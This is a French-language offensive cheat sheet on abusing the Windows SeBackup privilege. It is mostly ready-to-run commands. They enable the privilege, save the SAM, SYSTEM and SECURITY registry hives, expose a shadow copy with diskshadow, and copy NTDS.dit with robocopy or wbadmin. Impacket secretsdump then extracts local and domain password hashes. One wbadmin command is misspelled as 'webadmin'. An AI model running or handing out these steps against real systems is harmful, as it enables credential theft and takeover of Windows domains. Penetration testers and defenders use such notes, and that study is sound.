SeBackup
Le privilège SeBackup donne droit à l'utilisateur d'effectuer des sauvegardes. Le principe pour exploiter ce privilège est donc d'effectuer des sauvegardes du registre/de fichiers sensibles/etc afin d'obtenir les informations voulues.
Si le privilège est "disabled"
https://github.com/giuliano108/SeBackupPrivilege
| Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
|
| Set-SeBackupPrivilege
Get-SeBackupPrivilege
|
Ce qui permettra d'activer le privilège.
Sauvegarde du registre
Une sauvegarde du registre va permettre de récupérer les hash présents dans la SAM.
| reg save HKLM\SECURITY security.save
reg save HKLM\SYSTEM system.save
reg save HKLM\SAM sam.save
|
Une fois rapatrié sur notre poste attaquant, il est possible d'extraire les différents hash:
| impacket-secretsdump -security security.save -system system.save -sam sam.save local
|
Sauvegarde du fichier NTDS.dit
Plusieurs méthodes sont possibles selon le contexte.
Diskshadow
Création d'un script "backup.txt" pour diskshadow:
| set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup
|
Puis l'exécuter
| diskshadow /s .\backup.txt
|
Robocopy
Ceci va créer une réplique de C:\ sur le lecteur E:\ => les fichiers de E:\ sont ensuite copiables.
| robocopy /b E:\Windows\ntds . ntds.dit
|
| impacket-secretsdump -system system.save -ntds ntds.dit local
|
Wbadmin
Wbadmin permet de créer un backup
| wbadmin start backup -quiet -backuptarget:\\dc01\c$\temp -include:c:\windows\ntds
|
On récupère ensuite la version du backup
Puis on la restore à un endroit accessible
| webadmin start recovery -quiet -version:07/26/2021-03:16 -itemtype:file -item:c:\windows\ntds\ntds.dit -recoverytarget:c:\temp -notrestoreacl
|
| impacket-secretsdump -system system.save -ntds ntds.dit local
|